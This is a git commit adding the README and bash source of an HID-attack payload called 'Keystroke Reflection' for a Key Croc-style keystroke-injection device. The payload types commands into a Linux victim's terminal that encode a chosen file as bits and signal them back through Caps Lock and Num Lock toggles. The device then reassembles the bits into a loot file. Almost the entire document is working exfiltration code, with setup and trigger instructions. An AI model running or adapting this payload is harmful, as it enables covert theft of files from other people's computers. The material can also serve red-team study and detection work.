commit
ec518dfd79
|
@ -0,0 +1,59 @@
|
|||
# "Linux" Keystroke Reflection
|
||||
|
||||
- Title: "Linux" Keystroke Reflection
|
||||
- Author: TW-D
|
||||
- Version: 1.0
|
||||
- Target: Debian-Based Linux Distributions
|
||||
- Category: Exfiltration
|
||||
- Attackmode: HID
|
||||
|
||||
## Description
|
||||
|
||||
Implementation of the "Keystroke Reflection" technique for file exfiltration.
|
||||
|
||||
The table below presents an estimation of the time taken for a specific number of bytes :
|
||||
|
||||
| Bytes | Seconds (xdotool) |
|
||||
| --- | --- |
|
||||
| 5 | Between 10 and 15 |
|
||||
| 10 | Between 20 and 25 |
|
||||
| 100 | Between 220 and 230 |
|
||||
| 1000 | Between 2250 and 2260 |
|
||||
|
||||
__Note :__ *The target system must have "xxd" and "xdotool" installed.*
|
||||
|
||||
## Configuration
|
||||
|
||||
From the file "keystroke-reflection_exfiltration.txt" change the value of the following variable :
|
||||
```
|
||||
|
||||
######## SETUP ########
|
||||
|
||||
LED SETUP
|
||||
|
||||
export DUCKY_LANG="us"
|
||||
|
||||
```
|
||||
|
||||
## Trigger
|
||||
|
||||
>
|
||||
> MATCH __kr:file=(.*?)\[ENTER\]
|
||||
>
|
||||
|
||||
## Usage
|
||||
|
||||
The triggering must be done in a terminal.
|
||||
|
||||
```
|
||||
:~$ hostname > /tmp/EXFIL
|
||||
:~$ __kr:file=/tmp/EXFIL[ENTER]
|
||||
```
|
||||
|
||||
**OR**
|
||||
|
||||
```
|
||||
:~$ __kr:file=/etc/hostname[ENTER]
|
||||
```
|
||||
|
||||
__Note :__ *After triggering, avoid using the keyboard.*
|
|
@ -0,0 +1,119 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: "Linux" Keystroke Reflection
|
||||
# Description:
|
||||
# Implementation of the
|
||||
# "Keystroke Reflection" technique
|
||||
# for file exfiltration.
|
||||
#
|
||||
# Author: TW-D
|
||||
# Version: 1.0
|
||||
# Target: Debian-Based Linux Distributions
|
||||
# Category: Exfiltration
|
||||
# Attackmode: HID
|
||||
#
|
||||
# TESTED ON
|
||||
# ===============
|
||||
# Ubuntu 22.04.3 LTS with "Logitech Keyboard K120"
|
||||
#
|
||||
# STATUS
|
||||
# ===============
|
||||
# Magenta solid ................................... SETUP
|
||||
# Yellow single blink ............................. ATTACK
|
||||
# Yellow double blink ............................. STAGE2
|
||||
# Yellow triple blink ............................. STAGE3
|
||||
# White fast blink ................................ CLEANUP
|
||||
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
|
||||
#
|
||||
|
||||
######## TRIGGER ########
|
||||
|
||||
MATCH __kr:file=(.*?)\[ENTER\]
|
||||
|
||||
######## INITIALIZATION ########
|
||||
|
||||
readonly KR_FILE="$(echo "${LOOT}" | sed 's/\[[^]]*\]//g')"
|
||||
readonly KR_BIN="/tmp/keystroke-reflection.bin"
|
||||
readonly KEYCROC_LOOT="/root/loot/keystroke-reflection_$(date '+%s')-${RANDOM}"
|
||||
|
||||
######## SETUP ########
|
||||
|
||||
LED SETUP
|
||||
|
||||
export DUCKY_LANG="us"
|
||||
|
||||
######## ATTACK ########
|
||||
|
||||
LED ATTACK
|
||||
|
||||
QUACK STRING " binary_dump=\"\$(xxd -b ${KR_FILE} | cut -d' ' -f2-7)\";"
|
||||
QUACK STRING " key_sequence=\"\";"
|
||||
QUACK STRING " for ((i=0;i<\"\${#binary_dump}\";i++)); do"
|
||||
QUACK STRING " if [ \"\${binary_dump:\$i:1}\" == \"0\" ]; then"
|
||||
QUACK STRING " key_sequence+=\"Caps_Lock \";"
|
||||
QUACK STRING " elif [ \"\${binary_dump:\$i:1}\" == \"1\" ]; then"
|
||||
QUACK STRING " key_sequence+=\"Num_Lock \";"
|
||||
QUACK STRING " fi;"
|
||||
QUACK STRING " done;"
|
||||
QUACK STRING " sleep 3;"
|
||||
QUACK STRING " xdotool key --delay 275 \$key_sequence"
|
||||
QUACK DELAY 250
|
||||
QUACK ENTER
|
||||
|
||||
######## STAGE2 ########
|
||||
|
||||
LED STAGE2
|
||||
|
||||
loop_control="true"
|
||||
capslock_state="$(CAPSLOCK_ON)"
|
||||
numlock_state="$(NUMLOCK_ON)"
|
||||
|
||||
while [ "${loop_control}" == "true" ]; do
|
||||
start_time="$(date '+%s')"
|
||||
while true; do
|
||||
if [ "$(CAPSLOCK_ON)" != "${capslock_state}" ]; then
|
||||
echo -n "0" >> "${KR_BIN}"
|
||||
capslock_state="$(CAPSLOCK_ON)"
|
||||
break
|
||||
elif [ "$(NUMLOCK_ON)" != "${numlock_state}" ]; then
|
||||
echo -n "1" >> "${KR_BIN}"
|
||||
numlock_state="$(NUMLOCK_ON)"
|
||||
break
|
||||
elif [ $(($(date '+%s') - start_time)) -ge 9 ]; then
|
||||
loop_control="false"
|
||||
break
|
||||
fi
|
||||
done
|
||||
done
|
||||
|
||||
######## STAGE3 ########
|
||||
|
||||
LED STAGE3
|
||||
|
||||
if [ -f "${KR_BIN}" ]; then
|
||||
for binary in $(cat "${KR_BIN}" | sed 's/\(.\{8\}\)/\1 /g'); do
|
||||
decimal="$((2#${binary}))"
|
||||
hexadecimal="$(printf "%X" "${decimal}")"
|
||||
ascii="$(printf "\\x${hexadecimal}")"
|
||||
echo -en "${ascii}" >> "${KEYCROC_LOOT}"
|
||||
done
|
||||
rm "${KR_BIN}"
|
||||
fi
|
||||
|
||||
######## CLEANUP ########
|
||||
|
||||
LED CLEANUP
|
||||
|
||||
sync
|
||||
|
||||
######## FINISH ########
|
||||
|
||||
LED FINISH
|
||||
|
||||
ATTACKMODE OFF
|
||||
|
||||
######## OFF ########
|
||||
|
||||
LED OFF
|
||||
|
||||
reboot --force
|
Loading…
Reference in New Issue